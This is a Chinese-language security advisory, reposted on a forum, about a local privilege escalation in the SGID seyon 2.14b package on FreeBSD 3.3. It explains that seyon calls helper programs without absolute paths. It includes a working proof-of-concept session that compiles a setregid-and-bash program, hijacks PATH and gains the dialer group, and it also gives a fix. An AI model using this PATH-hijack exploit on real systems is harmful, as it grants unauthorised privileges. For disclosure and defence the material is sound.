FreeBSD 3.3 seyon漏洞
概述:
FreeBSD 3.3-RELEASE版的安装光盘中带有seyon v2.14b软件包。这个版本( 包含以前?)存在安全漏洞, 允许任意用户获得seyon所属组的特权。当缺省安装时,seyon被设置了SGID位 " dialer".
注意:不同版本的seyon和不同的2.14b包可能被设置了不同的属性。
漏洞详述:
syon执行时会先执行"seyon-emu"和"xterm",但这两个程序的路径并没有用 绝对路径,因此通过在$PATH中 增加一个用户可写目录并将用户自己的"seyon-emu"或"xterm"放到该目录下。
用户就可以让seyon以组ID "dialer"的身份来运行它们,从而获得"dialer"组 的特权。
漏洞实例:
bash-2.03$ uname -a; id; ls -la `which seyon` FreeBSD 3.3-RELEASE FreeBSD 3.3-RELEASE #0: Thu Sep 16 23:40:35 GM T 1999 [email protected]:/usr/src/sys/compile/GENERIC i386 uid=1000(xnec) gid=1000(xnec) groups=1000(xnec) -rwxr-sr-x 1 bin dialer 88480 Sep 11 00:55 /usr/X11R6/bin/seyon bash-2.03$ cat > seyonx.c void main () { setregid(getegid(), getegid()); system("/usr/local/bin/bash"); } ^D bash-2.03$ gcc -o seyon-emu seyonx.c bash-2.03$ PATH=.:$PATH bash-2.03$ seyon bash-2.03$ id uid=1000(xnec) gid=68(dialer) groups=68(dialer), 1000(xnec) bash-2.03$
解决方案:
chmod 750 `which seyon` 并将需要运行seyon的用户增加到"dialer"组中。
来源:Brock Tellier ([email protected])
-- 欢迎大家常来回合策略 宗教信仰坐坐。 欢迎光临魔法师学院http://wwwmagic.126.com * * * * * 无挂碍故无有恐怖 --DOS--
※ 来源:.网易虚拟社区北京站 http://bj.netease.com.[FROM: 202.106.250.252]
|
|